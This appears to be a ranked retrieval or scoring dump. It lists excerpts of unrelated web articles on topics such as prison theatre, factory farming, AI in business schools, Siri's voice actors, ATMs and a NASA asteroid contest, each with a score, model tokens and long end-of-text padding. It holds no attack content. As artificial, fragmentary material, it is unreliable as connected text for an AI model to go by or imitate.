not bleed? If you tickle us, do we not laugh?” + +A Friday performance of the Bard’s play by San Quentin State Prison inmates elicited laughter here and there, but ultimately drove home the notion that inmates are human beings and desire to be treated as more than just a number. + +The inmate actors said it’s difficult for people outside the prison gates to understand them, their emotions and the lives that led them to incarceration. Acting gives them an outlet to express those feelings and grow as individuals. + +Inmate Joey Mason, who played Salario, said acting has allowed him to get in touch with a side of himself he previously avoided. + +“It’s been an opportunity to be transparent, honest and open,” Mason said. “It’s a challenge. I used to run from these types of challenges because then I had to feel.” + +Mason, 53, is a Marin County resident serving 25 years to life under the three-strikes law, after a conviction for first-degree burglary. He and a dozen other inmates partnered with members of the Marin Shakespeare Company for the 10th year Friday to perform Shakespeare for about 150 inmates and visitors in the prison’s chapel. They had been preparing the performance for the past eight months, rehearsing Fridays for two hours. + +Inmate Kimani Randall, who played Lorenzo, said working with the Marin Shakespeare Company has profoundly affected his outlook on life. + +“It has inspired me to dream again,” Randall said. “It’s given me the courage to trust in other people.” + +Randall, 34, is a San Bernardino County resident serving a life sentence plus nine years for assault with a semi-automatic firearm, first- and second-degree burglary, robbery, vehicle theft and kidnapping. + +Play co-director Lesley Schisgall Currier, with the Marin Shakespeare Company, said the male inmates have developed conflict resolution skills, communication skills and empathy by discussing some of the issues the literature addresses. + +“Some of the themes in this play are very controversial,” Currier said. + +Anti-Semitism is present throughout the play, as are the themes of mercy, love, revenge and forgiveness. The main conflict is the powerful hatred the character Shylock feels for those who have derided him for being Jewish. He seeks revenge on one man in particular, Antonio, but his quest doesn +================================================================================ +Rank = 84; Score = 548864.0 +<|begin_of_text|>Jonathan Safran Foer's book Eating Animals changed me from a twenty-year vegetarian to a vegan activist. I've always been shy about being critical of others' choices because I hate when people do that to me. I'm often interrogated about being vegetarian (e.g., "What if you find out that carrots feel pain, too? Then what'll you eat?"). + +I've also been afraid to feel as if I know better than someone else -- a historically dangerous stance (I'm often reminded that "Hitler was a vegetarian, too, you know"). But this book reminded me that some things are just wrong. Perhaps others disagree with me that animals have personalities, but the highly documented torture of animals is unacceptable, and the human cost Foer describes in his book, of which I was previously unaware, is universally compelling. + +The human cost of factory farming -- both the compromised welfare of slaughterhouse workers and, even more, the environmental effects of the mass production of animals -- is staggering. Foer details the copious amounts of pig shit sprayed into the air that result in great spikes in human respiratory ailments, the development of new bacterial strains due to overuse of antibiotics on farmed animals, and the origins of the swine flu epidemic, whose story has gripped the nation, in factory farms. + +I read the chapter on animal shit aloud to two friends -- one is from Iowa and has asthma and the other is a North Carolinian who couldn't eat fish from her local river because animal waste had been dumped in it as described in the book. They had never truly thought about the connection between their environmental conditions and their food. The story of the mass farming of animals had more impact on them when they realized it had ruined their own backyards. + +But what Foer most bravely details is how eating animal pollutes not only our backyards, but also our beliefs. He reminds us that our food is symbolic of what we believe in, and that eating is how we demonstrate to ourselves and to others our beliefs: Catholics take communion -- in which food and drink represent body and blood. Jews use salty water on Passover to remind them of the slaves' bitter tears. And on Thanksgiving, Americans use succotash and slaughter to tell our own creation myth -- how the Pilgrims learned from Native Americans to harvest this land and make it their own. + +And as we use food to impart our beliefs to our children, the point from which Foer lifts off, what stories do we want to tell our children through their food +================================================================================ +Rank = 85; Score = 548864.0 +<|begin_of_text|>Cruelty that would be illegal if it were inflicted on dogs or cats, such as neglect, mutilation, transport through all weather extremes, and gruesome and violent slaughter, is commonplace in animal agribusiness. Yet farmed animals are no less intelligent or capable of feeling pain than dogs and cats. + +2. Factory farms threaten our waterways. + +The meat industry has a record of egregious water pollution. In fact, animal excrement and other agricultural runoff from large-scale farms have polluted nearly one-third of rivers in the U.S. + +3. Workers are exposed to injury and illness. + +Workplace hazards include injuries, respiratory illness, and PTSD. Workers are also at risk for infection by antibiotic-resistant bacteria. Earlier this year, it was revealed that on average, one Tyson employee a month is injured by equipment and loses a finger or limb. + +4. Farmed animals are mutilated without painkillers. + +Dehorning, tail docking, debeaking, and castration are all mutilations performed daily on factory farms. These cruel acts are carried out without the use of anesthesia, and because of the filthy conditions, they often result in infection. + +5. Meat production wastes an incredible amount of water. + +It reportedly takes 576 gallons of water to produce one pound of pork, 880 gallons of water to produce one gallon of milk, and a whopping 1,799 gallons of water to produce one pound of beef. + +6. Factory farms are breeding grounds for antibiotic-resistant bacteria. + +Eighty percent of all antibiotics used in the U.S. are administered to farmed animals. While these drugs are sometimes used to prevent and treat illness, they’re also used in low doses to keep animals alive in filthy, disease-ridden conditions that would otherwise kill them. + +7. Animals on factory farms are denied everything that is important to them. + +Most farmed animals will never root in the soil, build nests, or do anything that is natural to them. They won't even feel the sun on their backs or breathe fresh air until the day they are loaded onto trucks bound for slaughter. + +8. Raising animals for food has a devastating impact on the climate. + +According to the United Nations Food and Agriculture Organization, carbon dioxide emissions from raising farmed animals make up about 15 percent of global human-induced emissions. In fact, the meat industry emits more greenhouse gases than all the transportation in the world combined! + +9. Some farmed animals literally can’t move. + +Many animals on factory farms live in spaces so small they can’t even turn around, lie down comfortably +================================================================================ +Rank = 86; Score = 544768.0 +<|begin_of_text|>At Harvard Business School (HBS), MBA students are pondering a future when robots rule the road. The pioneers of the driverless car movement — such as Google and Tesla — are mapping the MBAs a future in which artificial intelligence and robotics will likely impact the entire job market and global economy. + +David Yoffie, professor of international business administration at HBS, believes such disruptive technologies are now an “essential” part of the b-school landscape. + +“What I’m trying to teach students is: What can these technologies deliver? And what are the challenges and opportunities for a company that does AI?” he says. + +David’s offered his MBAs two cases on artificial intelligence (or AI) and deep learning, and reckons that many of his colleagues at HBS are bringing robots into the curriculum too: “It’s a capability that MBAs need to know about,” he says. + +Students must understand how these technologies work on a basic level but, more importantly, how they may shape businesses of the future, says Jonathan Trevor, associate professor at Oxford University’s Saïd Business School. + +HBS and Oxford are two of eight top-ranked business schools to have told BusinessBecause that the robot invasion is breaking into the MBA degree — among them INSEAD, Cornell and ESCP Europe. + +NYU’s Stern School of Business offers courses on basic data handling skills plus programming languages like Python, and an introduction to machine learning. And at MIT Sloan School of Management, MBAs can take electives on AI and robotics at MIT’s Computer Science and Artificial Intelligence Labs, says Thomas Roemer, senior lecturer. + +“Business schools are putting more artificial intelligence or data science content into their curricula,” says professor Vasant Dhar of NYU Stern and the Center for Data Science. + +Like many of his peers, Vasant believes that, as machines become better at interpreting unstructured information and acting on it automatically, they will replace humans. Researchers at Oxford University reckon 47% of US jobs are at risk of being replaced by automation. + +Highly-skilled jobs are thought to be less at risk than manual work. But the role of the manager will change, Vasant says: “They’ll need different skills….To handle and interpret all kinds of data and [for] managing teams of people and machines.” + +Not only is proficiency in big data analytics now all the rage, but the ability to work with technologists too is hot in demand. “Students need to know how to communicate with the [data] scientists and machine learning experts,” says Thomas Lee, +================================================================================ +Rank = 87; Score = 544768.0 +<|begin_of_text|>He may have what he’s described as only “the Reader’s Digest knowledge of Buddhism,” but famed astrophysicist Neil deGrasse Tyson is a fascinating thinker in just about any capacity. + +So: what does he think about how Buddhist thought and science may or may not intersect? Can they learn from each other? That’s what author Jerome Freedman wanted to know when he sat down with Tyson in 2011. The outspoken Tyson, unsurprisingly, offered skeptical and thoughtful insights into Buddhist philosophy and the nature of the universe, and you’ll find a number of these distilled here in excerpts adapted from the full conversation (which you can read or order a copy of on Freedman’s website, here). Read on for Tyson’s thoughts on the Buddhist ideas of interconnectedness and impermanence, and how a Buddhist outlook might be more conducive to science. + +Interconnectedness + +There is a risk inherent in exploring overlap and resonance between science and spirituality. It’s very easy to ignore that which doesn’t resonate and sift through what does, and come to the misleading conclusion that Buddhism is perfectly aligned with modern cosmology. + +In modern times, we have come to learn about ecology, the interdependence of life, animal life, plant life, water supply, and the atmosphere as a system. Systems engineering is all about interconnectivity and parts that create one functioning whole. + +You could say that Buddha knew this from the beginning. However, before the 20th century, what a human did had very little consequence outside of their system. People were far enough apart that their behavior would not necessarily affect others. Back then, interconnectedness had very little meaningful consequence to anything. + +Today, we fly airplanes from continent to continent; insects and vermin ride ships from one place to another; we change gases in the atmosphere here that circulate around the globe. To say that we are interconnected today with the same fervor as we were interconnected a thousand years ago is just misusing the word. If you don’t distinguish those two cases, it’s hard to have a conversation about what it means to be interconnected. + +In our galaxy, we feel the gravity of another galaxy. We are going to collide with the Andromeda galaxy. That’s scheduled to happen after the sun dies. So, you can say we’re still all connected. But it’s kind of irrelevant because we’ll be vaporized. + +Furthermore, there’s a horizon of the universe that’s expanding. Beyond that horizon, we don’t even feel each others’ gravity. It’s beyond any +================================================================================ +Rank = 88; Score = 536576.0 +<|begin_of_text|>This post is a continuation from the previous one about the significance of dynamic intelligence in teaching children with autism to learn by themselves. Click here to read the previous post. + +I watched this beautiful mother intently as she told me about her 17 year old son. + +“I was shocked with the autism diagnosis but I never gave up. I tried everything that the speech therapist and occupational therapist asked me to do. And my son improved. It was the happiest day of my life when he got into a normal school.” + +“Everything is good, right?” I asked. Apparently, it wasn’t. + +“Why can’t he have a decent conversation without being prompted?” + +“Why does he always need prompting to give even the right answer appropriately?” + +“How come he learns by rote easily but doesn’t understand concepts?” + +“Why isn’t he confident?” + +“Why does he get bullied at school?” + +I knew how she felt, but continued to probe. + +“What are you looking for? What do you want your son to achieve?” + +“I want him to solve problems independently. I want him to have at least one friend. It breaks my heart to see him being bullied. He doesn’t understand when others are being sarcastic or making fun of him.” + +I saw her eyes shining with unshed tears. She continued with a tremor in her voice, “I’m not getting any younger. How long will I be around to support him?” + +“You’re a wonderful mother,” I said. “You did your best. You did what you were told to do. What you built is known as Static Intelligence. What you should be building though, is Dynamic Intelligence.” + +She looks at me disbelievingly. “What are you talking about? I’ve never heard these terms.” + +I get this question frequently. + +Are you aware of static and dynamic intelligence? + +Your eyes are set on your youngster being independent. You want him to be like the ‘other kids.’ You want him to understand the subtleties of language. + +You know that he has potential. But somehow, neither you nor the therapist are able to tap into it. + +Remember this image? + +Yes, static intelligence is that shiny object that you wanted to achieve. It was easy for your child to pick the right answers in a question. The best part – it’s measurable. + +Here’s the problem: + +Even after building static intelligence your child does not have friends, is not flexible and cannot solve problems independently. Does he keep looking at you for approval even though his answers are right? Does he still heavily rely on prompts? + +Are +================================================================================ +Rank = 89; Score = 532480.0 +<|begin_of_text|>Because no Internet meme is validated unless it comes out in printed form, Keanu Reeves has used the uber popular "Sad Keanu" meme as inspiration for a book. + +"Sad Keanu" hit last summer courtesy of a glorious paparazzi photo and the folks over at Reddit. Strangely enough, it took Reeves until October to find out about his own memetastic existence. + +Still, he's apparently taking it all in good stride — in spite of the fact that he's had a rather hard life, jam-packed with things to be sad about (aside from Bill & Ted 3). + +The New York Daily News reports that Reeves is out with a very limited edition book called Ode to Happiness — 4,000 copies are being sold in the UK. The book, which really started off as a joke, basically features a lot of ink blots with sad sayings under them. Sample: "I draw a hot sorrow bath." + +"[I was listening to a radio station that] was playing, like, an orgy of depressing, self-pitying, nostalgic music," Reeves told the Daily News. "You know, 'I'm so lonely and I've been left and my heart is broken.' It was so voluptuously horrible. And I just started to write on this piece of paper, because I had this image of, you know, that moment when you take that bath, you light that candle, and you're really just kind of depressed. And it was making [my friend] laugh so hard." + +Reeves also apparently hopes to pen another book called Haikus of Hope. "Basically like, 'I want to kill myself', and go from there," he told the publication.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 90; Score = 532480.0 +<|begin_of_text|>The English are a nation of poets. I am not speaking now of Keats or of Milton but of millions of my contemporaries. Surveys have established that three-quarters of the English now living have written poetry at some time, usually during adolescence. The same surveys have established that (increasingly) the English can hardly read, cannot spell or do arithmetic, and know nothing of their own history; but they do not let mere ignorance get in the way of self-expression. + +Little wonder that much of what they write has little merit from the purely literary point of view. But that does not mean that it is without interest or that it does not reveal something about the national soul. If the way a man dresses tells you something about him, won't his poetry do so also—however tasteless or garish it may be? + +For the vast majority, writing poetry is like chicken pox: once you've gone through it, you're immune for life. But, like the chicken pox virus, which can lie dormant in the body to erupt again in the form of shingles several decades later, usually at a time of bodily or mental stress, so the poetic muse can revive in exceptional circumstances—such as incarceration. The medical records of a significant minority of prisoners contain copies of poems they have written while in jail. + +Do you know, what it's like to be lonely, + +being just one, being the only? + +Do you realy care, + +that there's no one out there? + +Do you realy mind, + +or are you just blind? + +Am I all by myself + +Left to rot on the shelf? + +Who am I in here, + +Left on my own, I fear? + +Is there plenty of ways + +to end these long lonely days? + +Does it really matter + +if my mind begins to shatter? + +All of these questions, but why, + +am I put in here, and left to die? + +Actually, there was quite a good reason. The author of these lines, aged 29, had been found guilty of kidnapping a 12-year-old girl, whom he had repeatedly raped over the three days he held her captive. Nor was it his first such offense. He nevertheless concluded his poem with a reflection on the nature of friendship: + +What is the meaning of a true friend? + +is it to whom you can really depend? + +But it all becomes clear in the end, + +that everyone around me are just pretend. + +Murder also has its poetry, usually taking the form of lines addressed to the dear departed. Not a few murderers turn +================================================================================ +Rank = 91; Score = 524288.0 +<|begin_of_text|>This is the third and final post on the issue of robots and artificial intelligence (AI). In the first post, I argued that while robots and AI are a leap forward in mechanisation and automation, they will not do away with the basic contradiction within the capitalist mode of production between the drive to raise the productivity of labour and the profitability of capital over time. As I said “over time, a capital-bias or labour shedding means less new value is created (as labour is the only form of value) relative to the cost of invested capital. There is a tendency for profitability to fall as productivity rises. In turn, that leads eventually to a crisis in production that halts or even reverses the gain in production from the new technology. This is solely because investment and production depend on the profitability of capital in our modern mode of production.” + +In the second post, I considered in more detail how the law of value that dominates the profit-making capitalist mode of production would be affected by the hypothetical (or real?) possibility of a fully automated economy where no human labour is expended at all. “In our hypothetical all-encompassing robot/AI world, productivity (of use values) would tend to infinity while profitability (surplus value to capital value) would tend to zero. Human labour would no longer be employed and exploited by Capital (owners). Instead, robots would do all. This is no longer capitalism.” + +But I argued that before this state of ‘singularity’ (as it is called) was reached, capitalism as system would have broken down. “We would never get to a robotic society; we would never get to a workless society – not under capitalism. Crises and social explosions would intervene well before that… accumulation under capitalism would cease well before robots took over fully, because profitability would disappear under the weight of ‘capital-bias’.” + +In this third post, I want to consider just how likely it is that highly intelligent robots will take over the world of work (and maybe the world) in the near future. It’s my contention that, despite the optimism of the AI and robot drivers, it’s not going to happen soon. + +What is true is that the use of robots is rising fast. The level of robotics use has almost always doubled in the top capitalist economies in the last decade. Japan and Korea have the most robots per manufacturing employee, over 300 per 10,000 employees, with Germany following at over 250 per 10,000 employees. The United States has less than half the robots per +================================================================================ +Rank = 92; Score = 522240.0 +<|begin_of_text|>Media playback is unsupported on your device Media caption Meet the real Siri, and three other iconic voices of everyday technology. + +Millions of people hear their voices every day - but would you recognise them if you saw them walking down the street? + +Well maybe now you will. + +The BBC met the faces behind four of the most famous and iconic voices heard in technology today. + +Jon Briggs - The British 'Siri' + +Siri, Apple's voice-powered personal assistant, made its debut in June 2010. Since then, millions of the devices with the feature have been sold worldwide. + +Who needs humans? As the technology behind automated voices gets ever more advanced, we soon may be in a position where a believable, natural-sounding voice could be created from scratch. It would, unfortunately for those featured here, possibly mean the beginning of the end for voiceover artists. But should it? "Anything that is not human," says Jon, "it lacks the one quality that we of course have - which is emotion. "Until you can give inanimate objects emotion, then you're never going to be able to get over that particular problem." Sara believes the Speaking Clock should always remain a human voice due to its historical significance. "It's not just any other recording. It is something that has been through British history for so long, since 1936. "I cannot imagine anyone making that decision to say 'that's it, we're just putting it through a computer'. We'd be losing quite a lot." + +In the UK, the voice you will hear responding to commands belongs to Jon Briggs, an illustrious voiceover artist whose portfolio includes the likes of the Weakest Link, Radio 2 and Channel 4. + +Jon had offered up his voice to a firm that specialises in computer-generated speech - that is, taking Jon's voice but moulding it to say virtually any possible phrase. Apple, when creating Siri, picked out Jon - unbeknownst to him. + +"I discovered that I was being used as the voice of Siri when Rory Cellan-Jones, the BBC technology correspondent, suddenly started demonstrating it on BBC Breakfast. + +"I thought 'I recognise that voice!', and so it was true - and it's a slightly bizarre journey since then." + +It means that while his voice is now being played out countless times a day all over the country, Apple has not paid him - he only received the fee earned he when recording the original material. + +But, he says he's excited to be "in early" on what he believes is changing +================================================================================ +Rank = 93; Score = 516096.0 +<|begin_of_text|>Facebook and Google are building enormous neural networks—artificial brains—that can instantly recognize faces, cars, buildings, and other objects in digital photos. But that's not all these brains can do. + +They can recognize the spoken word, translate from one language to another, target ads, or teach a robot to screw a cap onto a bottle. And if you turn these brains upside down, you can teach them not just to recognize images, but create images—in rather intriguing (and sometimes disturbing) ways. + +As it revealed on Friday, Facebook is teaching its neural networks to automatically create small images of things like airplanes, automobiles, and animals, and about 40 percent of the time, these images can fool us humans into believing we're looking at reality. "The model can tell the difference between an unnatural image—white noise you'd see on your TV or some sort of abstract art image—and an image that you would take on your camera," says Facebook artificial intelligence researcher Rob Fergus. "It understands the structure of how images work" (see images above). + +Meanwhile, the boffins at Google have taken things to the other extreme, using neural nets to turn real photos into something intriguingly unreal. They're teaching machines to look for familiar patterns in a photo, enhance those patterns, and then repeat the process with the same image. "This creates a feedback loop: if a cloud looks a little bit like a bird, the network will make it look more like a bird," Google says in a blog post explaining the project. "This in turn will make the network recognize the bird even more strongly on the next pass and so forth, until a highly detailed bird appears, seemingly out of nowhere." The result is a kind of machine-generated abstract art (see below). + +Google + +On one level, these are party tricks—particularly Google's feedback loop, which evokes hallucinatory flashbacks. And it should be noted that Facebook's fake images are only 64-by-64 pixels. But on another level, these projects serve as ways of improving neural networks, moving them closer to human-like intelligence. This work, says David Luan, the CEO of a computer vision company called Dextro, "helps better visualize what our networks are actually learning." + +They're also slightly disturbing—and not just because Google's images feel like a drug trip gone wrong, crossing breeding birds with camels in some cases, or snails with pigs (see below). More than this, they hint at a world where we don't realize when machines are +================================================================================ +Rank = 94; Score = 516096.0 +<|begin_of_text|>More options: Share, Mark as favorite + +One thing automation alarmists sometimes miss is that the simplistic “machines steal jobs” story tells an incomplete tale. Take automatic teller machines. One might think the introduction of ATMs first in the 1970s eventually meant massive technological unemployment for bank tellers. Instead of depositing a check or withdrawing cash from a human, you could do it with an ATM card and a machine. (Or you could hack the ATM as seen in the 1990s film “Terminator: Judgment Day,” cleverly showing two different threats from smart machines.) + +But that’s not what happened, as this chart from “Learning by Doing: The Real Connection between Innovation, Wages, and Wealth” by James Bessen shows: + +In a recent EconTalk podcast, Bessen tells what happened: + +Basically starting in the mid-1990s, ATM machines came in in big numbers. We have, now, something like 400,000-some installed in the United States. And everybody assumed –including some of the bank managers, at first — that this was going to eliminate the teller job. And it didn’t. In fact, since 2000, not only have teller jobs increased, but they’ve been growing a bit faster than the labor force as a whole. That may eventually change. But the impact of the ATM machine was not to destroy tellers, actually it was to increase it. What happened? Well, the average bank branch in an urban area required about 21 tellers. That was cut because of the ATM machine to about 13 tellers. But that meant it was cheaper to operate a branch. Well, banks wanted, in part because of deregulation but just for deregulation but just for basic marketing reasons, to increase the number of branch offices. And when it became cheaper to do so, demand for branch offices increased. And as a result, demand for bank tellers increased. And it increased enough to offset the labor-saving losses of jobs that would have otherwise occurred. So, again, it was one of these more dynamic things where the labor-saving technology actually created more jobs. This is in fact a much more general pattern. We see a whole number of occupations where you might think that technology is going to destroy jobs because it’s taking over tasks; and the reverse happens. So, if you look, for instance, when they put in scanning technology into cash registers, the number of cashiers actually increased. When legal offices started using, +================================================================================ +Rank = 95; Score = 516096.0 +<|begin_of_text|>A global ban on developing artificially intelligent robot soldiers is needed to protect the future of mankind, a letter from hundreds of leading scientists including Stephen Hawking has warned. + +More than 1,000 scientists and businessmen signed the open letter from the Future of LIfe Institute, calling on world leaders to prevent artificial intelligence (AI) technology from being used in a "global arms race". + +Apple co-founder Steve Wozniak and SpaceX entrepreneur Elon Musk were also among the signatories of the letter, presented at a major conference in Argentina. + +The letter warns that developing weapons beyond existing remote control drones, which could 'think' for themselves without human input, is "feasible within years" - and have the potential to become the "Kalashnikovs of tomorrow". + +Launching a question and answer session on Reddit on the topic of AI, Prof Hawking said it was vital that scientists at the forefront of the technology keep the "human factor" at the "front and centre" of developments.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 96; Score = 514048.0 +<|begin_of_text|>Life, much like a startup, has multiple stages, phases and evolutions. As an entrepreneur, I've spent the last 13 years pitching ideas and building platforms and it just occurred to me that life, as I know it, has many similarities to business. + +From pitch to pivot, startups require creativity, endurance and courage. There's a lifespan and an order of growth that follows a methodology for success. When applied to life, the comparisons make a lot of sense. I started to take a look at my life through a business lens. Let's start with the pitch. + +In the startup world, your pitch can make or break the interest in your idea. It's your unique selling proposition and the essence of your business captured in a few brief sentences. For most, it's your first impression and for some, a lasting impression of your business forever. + +In life, the pitch happens daily -- when you introduce yourself to a potential client, interview for a new job or when you make new friends. How you tell your story can greatly impact the perception your audience has about you. Does your story align with who you are, right now? + +1. Pick a Niche. Stand For Something. + +I took a moment to think about my pitch and noticed a need for some major revisions. The number one question people ask me is, "What do you do?" I usually give them a vague combination of digital media and social strategy. In actuality, I have a passion for linking people to spaces, places and resources that help them reach their dreams. It sounds pie in the sky, but the number one reason why I launched The Greenhouse Innovation Hub, a technology incubator in Kakaako, was to create a place where we could cultivate creativity and ultimately, help people reach their dreams. + +Committing to a specific niche or purpose will bring clarity to who you are and refine your story to others. Which brings me to my next point. + +2. Get Real. Be Authentic. + +By being authentic about your story and speaking your truth, people will not only hear, but they will feel your passion for the journey and buy-in to your mission. + +Go beyond the title and dig deep to your core. Find a niche that you are passionate about and stick to it. Fear of committing to a niche lead me to believe that by keeping things vague, I could serve a larger amount of people, when in fact, I wasn't being true to myself and my passions. I took on jobs on I didn't enjoy resulting in a lower standard of work +================================================================================ +Rank = 97; Score = 509952.0 +<|begin_of_text|>Image copyright Reuters Image caption Better code could help identify where asteroids are heading + +US space agency Nasa is seeking coders who could help prevent a global catastrophe by identifying asteroids that may crash into Earth. + +Its Asteroid Data Hunter contest will offer $35,000 (£21,000) to programmers who can identify asteroids captured by ground-based telescopes. + +The winning solution must increase the detection rate and minimise the number of false positives. + +Scientists are increasingly calling for help to make sense of vast data sets. + +The new improved asteroid hunting code must also be able to ignore imperfections in the data and run on all computer systems. + +"Protecting the planet from the threat of asteroid impact means first knowing where they are," said Jenn Gustetic, executive of the programme. + +"By opening up the search for asteroids, we are harnessing the potential of innovators and makers and citizen scientists everywhere to solve this global challenge." + +Current asteroid detection is only tracking one percent of the estimated objects that orbit the sun, according to asteroid mining firm Planetary Resources, which is partnering with Nasa in the contest. + +Human curiosity + 